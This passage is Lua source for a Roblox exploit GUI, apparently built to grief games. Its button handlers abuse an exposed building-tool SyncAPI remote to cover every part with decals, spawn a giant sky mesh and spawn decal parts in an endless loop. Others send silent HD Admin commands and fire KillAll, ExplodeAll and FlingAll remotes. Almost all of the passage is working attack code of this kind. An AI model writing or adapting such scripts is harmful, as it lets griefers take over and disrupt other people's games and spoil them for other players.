		local tool
		for i,v in player:GetDescendants() do
			if v.Name == "SyncAPI" then
				tool = v.Parent
			end
		end
		for i,v in game.ReplicatedStorage:GetDescendants() do
			if v.Name == "SyncAPI" then
				tool = v.Parent
			end
		end
		--craaa
		remote = tool.SyncAPI.ServerEndpoint
		function _(args)
			remote:InvokeServer(unpack(args))
		end
		function SetCollision(part,boolean)
			local args = {
				[1] = "SyncCollision",
				[2] = {
					[1] = {
						["Part"] = part,
						["CanCollide"] = boolean
					}
				}
			}
			_(args)
		end
		function SetAnchor(boolean,part)
			local args = {
				[1] = "SyncAnchor",
				[2] = {
					[1] = {
						["Part"] = part,
						["Anchored"] = boolean
					}
				}
			}
			_(args)
		end
		function CreatePart(cf,parent)
			local args = {
				[1] = "CreatePart",
				[2] = "Normal",
				[3] = cf,
				[4] = parent
			}
			_(args)
		end
		function DestroyPart(part)
			local args = {
				[1] = "Remove",
				[2] = {
					[1] = part
				}
			}
			_(args)
		end
		function MovePart(part,cf)
			local args = {
				[1] = "SyncMove",
				[2] = {
					[1] = {
						["Part"] = part,
						["CFrame"] = cf
					}
				}
			}
			_(args)
		end
		function Resize(part,size,cf)
			local args = {
				[1] = "SyncResize",
				[2] = {
					[1] = {
						["Part"] = part,
						["CFrame"] = cf,
						["Size"] = size
					}
				}
			}
			_(args)
		end
		function AddMesh(part)
			local args = {
				[1] = "CreateMeshes",
				[2] = {
					[1] = {
						["Part"] = part
					}
				}
			}
			_(args)
		end
	
		function SetMesh(part,meshid)
			local args = {
				[1] = "SyncMesh",
				[2] = {
					[1] = {
						["Part"] = part,
						["MeshId"] = "rbxassetid://"..meshid
					}
				}
			}
			_(args)
		end
		function SetTexture(part, texid)
			local args = {
				[1] = "SyncMesh",
				[2] = {
					[1] = {
						["Part"] = part,
						["TextureId"] = "rbxassetid://"..texid
					}
				}
			}
			_(args)
		end
		function SetName(part, stringg)
			local args = {
				[1] = "SetName",
				[2] = {
					[1] = part
				},
				[3] = stringg
			}
	
			_(args)
		end
		function MeshResize(part,size)
			local args = {
				[1] = "SyncMesh",
				[2] = {
					[1] = {
						["Part"] = part,
						["Scale"] = size
					}
				}
			}
			_(args)
		end
		function Weld(part1, part2,lead)
			local args = {
				[1] = "CreateWelds",
				[2] = {
					[1] = part1,
					[2] = part2
				},
				[3] = lead
			}
			_(args)
	
		end
		function SetLocked(part,boolean)
			local args = {
				[1] = "SetLocked",
				[2] = {
					[1] = part
				},
				[3] = boolean
			}
			_(args)
		end
		function SetTrans(part,int)
			local args = {
				[1] = "SyncMaterial",
				[2] = {
					[1] = {
						["Part"] = part,
						["Transparency"] = int
					}
				}
			}
			_(args)
		end
		function CreateSpotlight(part)
			local args = {
				[1] = "CreateLights",
				[2] = {
					[1] = {
						["Part"] = part,
						["LightType"] = "SpotLight"
					}
				}
			}
			_(args)
		end
		function SyncLighting(part,brightness)
			local args = {
				[1] = "SyncLighting",
				[2] = {
					[1] = {
						["Part"] = part,
						["LightType"] = "SpotLight",
						["Brightness"] = brightness
					}
				}
			}
			_(args)
		end
		function Color(part,color)
			local args = {
				[1] = "SyncColor",
				[2] = {
					[1] = {
						["Part"] = part,
						["Color"] = color --[[Color3]],
						["UnionColoring"] = false
					}
				}
			}
			_(args)
		end
		function SpawnDecal(part,side)
			local args = {
				[1] = "CreateTextures",
				[2] = {
					[1] = {
						["Part"] = part,
						["Face"] = side,
						["TextureType"] = "Decal"
					}
				}
			}
	
			_(args)
		end
		function AddDecal(part,asset,side)
			local args = {
				[1] = "SyncTexture",
				[2] = {
					[1] = {
						["Part"] = part,
						["Face"] = side,
						["TextureType"] = "Decal",
						["Texture"] = "rbxassetid://".. asset
					}
				}
			}
			_(args)
		end
	
		function Sky(id)
			e = char.HumanoidRootPart.CFrame.x
			f = char.HumanoidRootPart.CFrame.y
			g = char.HumanoidRootPart.CFrame.z
			CreatePart(CFrame.new(math.floor(e),math.floor(f),math.floor(g)) + Vector3.new(0,6,0),workspace)
			for i,v in game.Workspace:GetDescendants() do
				if v:IsA("BasePart") and v.CFrame.x == math.floor(e) and v.CFrame.z == math.floor(g) then
					--spawn(function()
					SetName(v,"Sky")
					AddMesh(v)
					--end)
					--spawn(function()
					SetMesh(v,"111891702759441")
					SetTexture(v,id)
					--end)
					MeshResize(v,Vector3.new(10000,10000,10000))
					SetLocked(v,true)
				end
			end
		end
		Sky("85750000985789")
	end)
end;
task.spawn(C_22);
-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
local function C_24()
local script = G2L["24"];
	script.Parent.MouseButton1Click:Connect(function()
		local player = game.Players.LocalPlayer
		local char = player.Character
		local tool
		for i,v in player:GetDescendants() do
			if v.Name == "SyncAPI" then
				tool = v.Parent
			end
		end
		for i,v in game.ReplicatedStorage:GetDescendants() do
			if v.Name == "SyncAPI" then
				tool = v.Parent
			end
		end
		--craaa
		remote = tool.SyncAPI.ServerEndpoint
		function _(args)
			remote:InvokeServer(unpack(args))
		end
		function SetCollision(part,boolean)
			local args = {
				[1] = "SyncCollision",
				[2] = {
					[1] = {
						["Part"] = part,
						["CanCollide"] = boolean
					}
				}
			}
			_(args)
		end
		function SetAnchor(boolean,part)
			local args = {
				[1] = "SyncAnchor",
				[2] = {
					[1] = {
						["Part"] = part,
						["Anchored"] = boolean
					}
				}
			}
			_(args)
		end
		function CreatePart(cf,parent)
			local args = {
				[1] = "CreatePart",
				[2] = "Normal",
				[3] = cf,
				[4] = parent
			}
			_(args)
		end
		function DestroyPart(part)
			local args = {
				[1] = "Remove",
				[2] = {
					[1] = part
				}
			}
			_(args)
		end
		function MovePart(part,cf)
			local args = {
				[1] = "SyncMove",
				[2] = {
					[1] = {
						["Part"] = part,
						["CFrame"] = cf
					}
				}
			}
			_(args)
		end
		function Resize(part,size,cf)
			local args = {
				[1] = "SyncResize",
				[2] = {
					[1] = {
						["Part"] = part,
						["CFrame"] = cf,
						["Size"] = size
					}
				}
			}
			_(args)
		end
		function AddMesh(part)
			local args = {
				[1] = "CreateMeshes",
				[2] = {
					[1] = {
						["Part"] = part
					}
				}
			}
			_(args)
		end
	
		function SetMesh(part,meshid)
			local args = {
				[1] = "SyncMesh",
				[2] = {
					[1] = {
						["Part"] = part,
						["MeshId"] = "rbxassetid://"..meshid
					}
				}
			}
			_(args)
		end
		function SetTexture(part, texid)
			local args = {
				[1] = "SyncMesh",
				[2] = {
					[1] = {
						["Part"] = part,
						["TextureId"] = "rbxassetid://"..texid
					}
				}
			}
			_(args)
		end
		function SetName(part, stringg)
			local args = {
				[1] = "SetName",
				[2] = {
					[1] = part
				},
				[3] = stringg
			}
	
			_(args)
		end
		function MeshResize(part,size)
			local args = {
				[1] = "SyncMesh",
				[2] = {
					[1] = {
						["Part"] = part,
						["Scale"] = size
					}
				}
			}
			_(args)
		end
		function Weld(part1, part2,lead)
			local args = {
				[1] = "CreateWelds",
				[2] = {
					[1] = part1,
					[2] = part2
				},
				[3] = lead
			}
			_(args)
	
		end
		function SetLocked(part,boolean)
			local args = {
				[1] = "SetLocked",
				[2] = {
					[1] = part
				},
				[3] = boolean
			}
			_(args)
		end
		function SetTrans(part,int)
			local args = {
				[1] = "SyncMaterial",
				[2] = {
					[1] = {
						["Part"] = part,
						["Transparency"] = int
					}
				}
			}
			_(args)
		end
		function CreateSpotlight(part)
			local args = {
				[1] = "CreateLights",
				[2] = {
					[1] = {
						["Part"] = part,
						["LightType"] = "SpotLight"
					}
				}
			}
			_(args)
		end
		function SyncLighting(part,brightness)
			local args = {
				[1] = "SyncLighting",
				[2] = {
					[1] = {
						["Part"] = part,
						["LightType"] = "SpotLight",
						["Brightness"] = brightness
					}
				}
			}
			_(args)
		end
		function Color(part,color)
			local args = {
				[1] = "SyncColor",
				[2] = {
					[1] = {
						["Part"] = part,
						["Color"] = color --[[Color3]],
						["UnionColoring"] = false
					}
				}
			}
			_(args)
		end
		function SpawnDecal(part,side)
			local args = {
				[1] = "CreateTextures",
				[2] = {
					[1] = {
						["Part"] = part,
						["Face"] = side,
						["TextureType"] = "Decal"
					}
				}
			}
	
			_(args)
		end
		function AddDecal(part,asset,side)
			local args = {
				[1] = "SyncTexture",
				[2] = {
					[1] = {
						["Part"] = part,
						["Face"] = side,
						["TextureType"] = "Decal",
						["Texture"] = "rbxassetid://".. asset
					}
				}
			}
			_(args)
		end
	
		function spam(id)
			for i,v in game.workspace:GetDescendants() do
				if v:IsA("BasePart") then
					spawn(function()
						SetLocked(v,false)
						SpawnDecal(v,Enum.NormalId.Front)
						AddDecal(v,id,Enum.NormalId.Front)
	
						SpawnDecal(v,Enum.NormalId.Back)
						AddDecal(v,id,Enum.NormalId.Back)
	
						SpawnDecal(v,Enum.NormalId.Right)
						AddDecal(v,id,Enum.NormalId.Right)
	
						SpawnDecal(v,Enum.NormalId.Left)
						AddDecal(v,id,Enum.NormalId.Left)
	
						SpawnDecal(v,Enum.NormalId.Bottom)
						AddDecal(v,id,Enum.NormalId.Bottom)
	
						SpawnDecal(v,Enum.NormalId.Top)
						AddDecal(v,id,Enum.NormalId.Top)
					end)
				end
			end 
		end
		spam("85750000985789")
	end)
end;
task.spawn(C_24);
-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
local function C_26()
local script = G2L["26"];
	script.Parent.MouseButton1Click:Connect(function()
		--[[
		WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk!
	]]
		local player = game.Players.LocalPlayer
	
		local char = player.Character
	
		local tool
	
		for i,v in player:GetDescendants() do
	
			if v.Name == "SyncAPI" then		tool = v.Parent
	
			end
	
		end
	
		for i,v in game.ReplicatedStorage:GetDescendants() do
	
			if v.Name == "SyncAPI" then
	
				tool = v.Parent
	
			end
	
		end
	
		local remote = tool.SyncAPI.ServerEndpoint
	
		function _(args)
	
			remote:InvokeServer(unpack(args))
	
		end
	
		function SetCollision(part,boolean)
	
			local args = {
	
				[1] = "SyncCollision",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["CanCollide"] = boolean
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function SetAnchor(boolean,part)
	
			local args = {
	
				[1] = "SyncAnchor",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["Anchored"] = boolean
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function CreatePart(cf,parent)
	
			local args = {
	
				[1] = "CreatePart",
	
				[2] = "Normal",
	
				[3] = cf,
	
				[4] = parent
	
			}
	
			_(args)
	
		end
	
		function DestroyPart(part)
	
			local args = {
	
				[1] = "Remove",
	
				[2] = {
	
					[1] = part
	
				}
	
			}
	
			_(args)
	
		end
	
		function MovePart(part,cf)
	
			local args = {
	
				[1] = "SyncMove",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["CFrame"] = cf
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function Resize(part,size,cf)
	
			local args = {
	
				[1] = "SyncResize",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["CFrame"] = cf,
	
						["Size"] = size
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function AddMesh(part)
	
			local args = {
	
				[1] = "CreateMeshes",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function SetMesh(part,meshid)
	
			local args = {
	
				[1] = "SyncMesh",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["MeshId"] = "rbxassetid://"..meshid
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function SetTexture(part, texid)
	
			local args = {
	
				[1] = "SyncMesh",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["TextureId"] = "rbxassetid://"..texid
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function SetName(part, stringg)
	
			local args = {
	
				[1] = "SetName",
	
				[2] = {
	
					[1] = part
	
				},
	
				[3] = stringg
	
			}
	
			_(args)
	
		end
	
		function MeshResize(part,size)
	
			local args = {
	
				[1] = "SyncMesh",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["Scale"] = size
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function Weld(part1, part2,lead)
	
			local args = {
	
				[1] = "CreateWelds",
	
				[2] = {
	
					[1] = part1,
	
					[2] = part2
	
				},
	
				[3] = lead
	
			}
	
			_(args)
	
		end
	
		function SetLocked(part,boolean)
	
			local args = {
	
				[1] = "SetLocked",
	
				[2] = {
	
					[1] = part
	
				},
	
				[3] = boolean
	
			}
	
			_(args)
	
		end
	
		function SetTrans(part,int)
	
			local args = {
	
				[1] = "SyncMaterial",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["Transparency"] = int
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function CreateSpotlight(part)
	
			local args = {
	
				[1] = "CreateLights",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["LightType"] = "SpotLight"
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function SyncLighting(part,brightness)
	
			local args = {
	
				[1] = "SyncLighting",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["LightType"] = "SpotLight",
	
						["Brightness"] = brightness
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function Color(part,color)
	
			local args = {
	
				[1] = "SyncColor",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["Color"] = color,
	
						["UnionColoring"] = false
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function SpawnDecal(part,side)
	
			local args = {
	
				[1] = "CreateTextures",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["Face"] = side,
	
						["TextureType"] = "Decal"
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		function AddDecal(part,asset,side)
	
			local args = {
	
				[1] = "SyncTexture",
	
				[2] = {
	
					[1] = {
	
						["Part"] = part,
	
						["Face"] = side,
	
						["TextureType"] = "Decal",
	
						["Texture"] = "rbxassetid://".. asset
	
					}
	
				}
	
			}
	
			_(args)
	
		end
	
		-- ðŸ”¹ Tambahan: daftar 3 ID decal
	
		local ids = {
	
			"85750000985789", -- ID 1
	
			"85750000985789", -- ID 2
	
			"85750000985789"  -- ID 3
	
		}
	
		while wait(0.1) do
	
			spawn(function()
	
				local e = char.HumanoidRootPart.CFrame.x + math.random(-100, 100)
	
				local f = char.HumanoidRootPart.CFrame.y
	
				local g = char.HumanoidRootPart.CFrame.z + math.random(-100, 100)
	
				CreatePart(CFrame.new(math.floor(e), math.floor(f), math.floor(g)) + Vector3.new(0,6,0), workspace)
	
				for i,v in game.Workspace:GetDescendants() do
	
					if v:IsA("BasePart") and v.CFrame.x == math.floor(e) and v.CFrame.z == math.floor(g) then
	
						SetName(v,"particle")
	
						-- ðŸ”¹ pilih salah satu ID acak dari daftar di atas
	
						local id = ids[math.random(1, #ids)]
	
						SpawnDecal(v,Enum.NormalId.Front)
	
						AddDecal(v,id,Enum.NormalId.Front)
	
						SpawnDecal(v,Enum.NormalId.Back)
	
						AddDecal(v,id,Enum.NormalId.Back)
	
						SetTrans(v,1)
	
						Resize(v,Vector3.new(7,7,0.1),v.CFrame)
	
						SetLocked(v,true)
	
						while wait(0.01) do
	
							MovePart(v,CFrame.new(v.CFrame.x,v.CFrame.y + 3,v.CFrame.z))
	
						end
	
					end
	
				end
	
			end)
	
		end
	end)
end;
task.spawn(C_26);
-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
local function C_28()
local script = G2L["28"];
	script.Parent.MouseButton1Click:Connect(function()
		local ReplicatedStorage = game:GetService("ReplicatedStorage")
		local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommandSilent
	
		RequestCommand:InvokeServer(";any admin cmd hint/message Petertiffon HAXX")
	end)
end;
task.spawn(C_28);
-- StarterGui.Petertiffon.ImageLabel.More.TextButton.LocalScript
local function C_2a()
local script = G2L["2a"];
	script.Parent.MouseButton1Click:Connect(function()
		local ReplicatedStorage = game:GetService("ReplicatedStorage")
		local RequestCommand = ReplicatedStorage:WaitForChild("HDAdminHDClient").Signals.RequestCommandSilent
	
		RequestCommand:InvokeServer(";any admin cmd ;music 3706740802")
	end)
end;
task.spawn(C_2a);
-- StarterGui.Petertiffon.ImageLabel.LocalScript
local function C_2b()
local script = G2L["2b"];
	script.Parent.Active=true
	script.Parent.Draggable=true
end;
task.spawn(C_2b);
-- StarterGui.Petertiffon.ImageLabel.TextLabel.LocalScript
local function C_2d()
local script = G2L["2d"];
	script.Parent.Text="==Version: "..script.Value.Value.." =="
end;
task.spawn(C_2d);
-- StarterGui.Petertiffon.ImageLabel.LocalScript
local function C_2f()
local script = G2L["2f"];
	-- Services
	local TweenService = game:GetService("TweenService")
	
	-- The ImageLabel
	local img = script.Parent
	
	-- Save final position
	local finalPosition = img.Position
	
	-- Set anchor to center for rotation
	img.AnchorPoint = Vector2.new({0.067, 0},{0.131, 0})
	
	-- Start off-screen to the left
	img.Position = UDim2.new(-0.5, 0, finalPosition.Y.Scale, finalPosition.Y.Offset)
	img.Rotation = -30
	
	-- Create the slide-in + bounce tween
	local slideTween = TweenService:Create(img, TweenInfo.new(
		0.7, 
		Enum.EasingStyle.Back, 
		Enum.EasingDirection.Out
		), {
			Position = finalPosition,
			Rotation = 15
		})
	
	-- Create the settle tween
	local settleTween = TweenService:Create(img, TweenInfo.new(
		0.3,
		Enum.EasingStyle.Elastic,
		Enum.EasingDirection.Out
		), {
			Rotation = 0
		})
	
	-- Play animation
	slideTween:Play()
	slideTween.Completed:Connect(function()
		settleTween:Play()
	end)
	
end;
task.spawn(C_2f);
-- StarterGui.Petertiffon.ImageLabel.TextButton.LocalScript
local function C_31()
local script = G2L["31"];
	script.Parent.MouseButton1Click:Connect(function()
		--[=[
	 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
	88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
	88      88    88    88            odD'      88      88    88 88ooo88 
	88  ooo 88    88    88          .88'        88      88    88 88~~~88 
	88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
	 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
	]=]
	
		-- Instances: 16 | Scripts: 6 | Modules: 0 | Tags: 0
		local G2L = {};
	
		-- StarterGui.O.A.A
		G2L["1"] = Instance.new("ScreenGui", game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui"));
		G2L["1"]["Name"] = [[O.A.A]];
		G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;
	
	
		-- StarterGui.O.A.A.ImageLabel
		G2L["2"] = Instance.new("ImageLabel", G2L["1"]);
		G2L["2"]["Active"] = true;
		G2L["2"]["BorderSizePixel"] = 0;
		G2L["2"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["2"]["Image"] = [[rbxassetid://109311455842653]];
		G2L["2"]["Size"] = UDim2.new(0, 308, 0, 309);
		G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["2"]["BackgroundTransparency"] = 1;
		G2L["2"]["Position"] = UDim2.new(0.09324, 0, 0.55458, 0);
	
	
		-- StarterGui.O.A.A.ImageLabel.TextButton
		G2L["3"] = Instance.new("TextButton", G2L["2"]);
		G2L["3"]["BorderSizePixel"] = 0;
		G2L["3"]["TextSize"] = 40;
		G2L["3"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["3"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["3"]["FontFace"] = Font.new([[rbxasset://fonts/families/ComicNeueAngular.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
		G2L["3"]["BackgroundTransparency"] = 0.6;
		G2L["3"]["Size"] = UDim2.new(0, 281, 0, 37);
		G2L["3"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["3"]["Text"] = [[Kill All]];
		G2L["3"]["Position"] = UDim2.new(0.04221, 0, 0.05502, 0);
	
	
		-- StarterGui.O.A.A.ImageLabel.TextButton.LocalScript
		G2L["4"] = Instance.new("LocalScript", G2L["3"]);
	
	
	
		-- StarterGui.O.A.A.ImageLabel.TextLabel
		G2L["5"] = Instance.new("TextLabel", G2L["2"]);
		G2L["5"]["BorderSizePixel"] = 0;
		G2L["5"]["TextSize"] = 23;
		G2L["5"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["5"]["FontFace"] = Font.new([[rbxasset://fonts/families/ComicNeueAngular.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
		G2L["5"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["5"]["BackgroundTransparency"] = 0.85;
		G2L["5"]["Size"] = UDim2.new(0, 308, 0, 30);
		G2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["5"]["Text"] = [[OBAMA ADMIN ABUSE]];
		G2L["5"]["Position"] = UDim2.new(0, 0, -0.09709, 0);
	
	
		-- StarterGui.O.A.A.ImageLabel.TextLabel.UIGradient
		G2L["6"] = Instance.new("UIGradient", G2L["5"]);
		G2L["6"]["Color"] = ColorSequence.new{ColorSequenceKeypoint.new(0.000, Color3.fromRGB(255, 0, 5)),ColorSequenceKeypoint.new(1.000, Color3.fromRGB(24, 94, 255))};
	
	
		-- StarterGui.O.A.A.ImageLabel.TextButton
		G2L["7"] = Instance.new("TextButton", G2L["2"]);
		G2L["7"]["BorderSizePixel"] = 0;
		G2L["7"]["TextSize"] = 40;
		G2L["7"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["7"]["FontFace"] = Font.new([[rbxasset://fonts/families/ComicNeueAngular.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
		G2L["7"]["BackgroundTransparency"] = 0.6;
		G2L["7"]["Size"] = UDim2.new(0, 281, 0, 37);
		G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["7"]["Text"] = [[Explode All]];
		G2L["7"]["Position"] = UDim2.new(0.04221, 0, 0.24919, 0);
	
	
		-- StarterGui.O.A.A.ImageLabel.TextButton.LocalScript
		G2L["8"] = Instance.new("LocalScript", G2L["7"]);
	
	
	
		-- StarterGui.O.A.A.ImageLabel.TextButton
		G2L["9"] = Instance.new("TextButton", G2L["2"]);
		G2L["9"]["BorderSizePixel"] = 0;
		G2L["9"]["TextSize"] = 40;
		G2L["9"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["9"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["9"]["FontFace"] = Font.new([[rbxasset://fonts/families/ComicNeueAngular.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
		G2L["9"]["BackgroundTransparency"] = 0.6;
		G2L["9"]["Size"] = UDim2.new(0, 281, 0, 37);
		G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["9"]["Text"] = [[Fling All]];
		G2L["9"]["Position"] = UDim2.new(0.04221, 0, 0.45955, 0);
	
	
		-- StarterGui.O.A.A.ImageLabel.TextButton.LocalScript
		G2L["a"] = Instance.new("LocalScript", G2L["9"]);
	
	
	
		-- StarterGui.O.A.A.ImageLabel.TextButton
		G2L["b"] = Instance.new("TextButton", G2L["2"]);
		G2L["b"]["BorderSizePixel"] = 0;
		G2L["b"]["TextSize"] = 40;
		G2L["b"]["TextColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["b"]["FontFace"] = Font.new([[rbxasset://fonts/families/ComicNeueAngular.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
		G2L["b"]["BackgroundTransparency"] = 0.6;
		G2L["b"]["Size"] = UDim2.new(0, 281, 0, 37);
		G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["b"]["Text"] = [[Give Lucky Block]];
		G2L["b"]["Position"] = UDim2.new(0.04221, 0, 0.65049, 0);
	
	
		-- StarterGui.O.A.A.ImageLabel.TextButton.LocalScript
		G2L["c"] = Instance.new("LocalScript", G2L["b"]);
	
	
	
		-- StarterGui.O.A.A.ImageLabel.Frame
		G2L["d"] = Instance.new("Frame", G2L["2"]);
		G2L["d"]["BorderSizePixel"] = 0;
		G2L["d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["d"]["Size"] = UDim2.new(0, 69, 0, 32);
		G2L["d"]["Position"] = UDim2.new(0.04221, 0, 0.87055, 0);
		G2L["d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["d"]["BackgroundTransparency"] = 0.99;
	
	
		-- StarterGui.O.A.A.ImageLabel.Frame.LocalScript
		G2L["e"] = Instance.new("LocalScript", G2L["d"]);
	
	
	
		-- StarterGui.O.A.A.ImageLabel.Loop
		G2L["f"] = Instance.new("TextLabel", G2L["2"]);
		G2L["f"]["BorderSizePixel"] = 0;
		G2L["f"]["TextSize"] = 36;
		G2L["f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["f"]["FontFace"] = Font.new([[rbxasset://fonts/families/ComicNeueAngular.json]], Enum.FontWeight.Bold, Enum.FontStyle.Normal);
		G2L["f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
		G2L["f"]["BackgroundTransparency"] = 1;
		G2L["f"]["Size"] = UDim2.new(0, 186, 0, 32);
		G2L["f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
		G2L["f"]["Text"] = [[Looped]];
		G2L["f"]["Name"] = [[Loop]];
		G2L["f"]["Position"] = UDim2.new(0.35065, 0, 0.87055, 0);
	
	
		-- StarterGui.O.A.A.ImageLabel.LocalScript
		G2L["10"] = Instance.new("LocalScript", G2L["2"]);
	
	
	
		-- StarterGui.O.A.A.ImageLabel.TextButton.LocalScript
		local function C_4()
			local script = G2L["4"];
			script.Parent.MouseButton1Click:Connect(function()
				game:GetService("ReplicatedStorage"):WaitForChild("KillAll"):FireServer()
			end)
		end;
		task.spawn(C_4);
		-- StarterGui.O.A.A.ImageLabel.TextButton.LocalScript
		local function C_8()
			local script = G2L["8"];
			script.Parent.MouseButton1Click:Connect(function()
				game:GetService("ReplicatedStorage"):WaitForChild("ExplodeAll"):FireServer()
			end)
		end;
		task.spawn(C_8);
		-- StarterGui.O.A.A.ImageLabel.TextButton.LocalScript
		local function C_a()
			local script = G2L["a"];
			script.Parent.MouseButton1Click:Connect(function()
				game:GetService("ReplicatedStorage"):WaitForChild("FlingAll"):FireServer()
			end)
		end;
		task.spawn(C_a);
		-- StarterGui.O.A.A.ImageLabel.TextButton.LocalScript
		local function C_c()
			local script = G2L["c"];
			script.Parent.MouseButton1Click:Connect(function()
				game:GetService("ReplicatedStorage"):WaitForChild("LuckyBlockGive"):FireServer()
			end)
		end;
		task.spawn(C_c);
		-- StarterGui.O.A.A.ImageLabel.Frame.LocalScript
		local function C_e()
			local script = G2L["e"];
			local Parent = script.Parent
			local TweenService = game:GetService("TweenService")
			local RunService = game:GetService("RunService")
	
			--------------------------------------------------------------------
			-- CREATE SWITCH FRAME BASED ON PARENT POSITION / SIZE
			--------------------------------------------------------------------
			local Switch = Instance.new("Frame")
			Switch.Name = "Switch"
			Switch.Parent = Parent.Parent
			Switch.Position = Parent.Position      -- use parent’s pos
			Switch.Size = Parent.Size              -- use parent’s size
			Switch.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
			Switch.BorderSizePixel = 0
	
			local Corner = Instance.new("UICorner")
			Corner.CornerRadius = UDim.new(1, 0)
			Corner.Parent = Switch
	
			--------------------------------------------------------------------
			-- CREATE KNOB
			--------------------------------------------------------------------
			local Knob = Instance.new("Frame")
			Knob.Name = "Knob"
			Knob.Parent = Switch
			Knob.Size = UDim2.new(0, Switch.AbsoluteSize.Y - 4, 0, Switch.AbsoluteSize.Y - 4)
			Knob.Position = UDim2.new(0, 2, 0, 2)
			Knob.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
			Knob.BorderSizePixel = 0
	
			local KnobCorner = Instance.new("UICorner")
			KnobCorner.CornerRadius = UDim.new(1, 0)
			KnobCorner.Parent = Knob
	
			--------------------------------------------------------------------
			-- SWITCH STATE + LOOP SYSTEM
			--------------------------------------------------------------------
			local IsOn = false
			local Loops = {} -- stores all your looping actions
	
			local function AddLoop(name, fn)
				Loops[name] = {
					Active = false,
					Action = fn,
					Connection = nil
				}
			end
	
			local function StartAll()
				for _, L in pairs(Loops) do
					if not L.Connection then
						L.Active = true
						L.Connection = RunService.RenderStepped:Connect(function()
							if L.Active then
								L.Action()
							end
						end)
					end
				end
			end
	
			local function StopAll()
				for _, L in pairs(Loops) do
					L.Active = false
					if L.Connection then
						L.Connection:Disconnect()
						L.Connection = nil
					end
				end
			end
	
			--------------------------------------------------------------------
			-- ANIMATION
			--------------------------------------------------------------------
			local function AnimateSwitch(on)
				local knobPos
				local color
	
				if on then
					knobPos = UDim2.new(1, -Knob.AbsoluteSize.X - 2, 0, 2)
					color = Color3.fromRGB(0, 200, 0)
				else
					knobPos = UDim2.new(0, 2, 0, 2)
					color = Color3.fromRGB(60, 60, 60)
				end
	
				TweenService:Create(
					Knob,
					TweenInfo.new(.15, Enum.EasingStyle.Sine, Enum.EasingDirection.Out),
					{Position = knobPos}
				):Play()
	
				TweenService:Create(
					Switch,
					TweenInfo.new(.2, Enum.EasingStyle.Sine, Enum.EasingDirection.Out),
					{BackgroundColor3 = color}
				):Play()
			end
	
			--------------------------------------------------------------------
			-- CLICK INPUT
			--------------------------------------------------------------------
			Switch.InputBegan:Connect(function(input)
				if input.UserInputType == Enum.UserInputType.MouseButton1 then
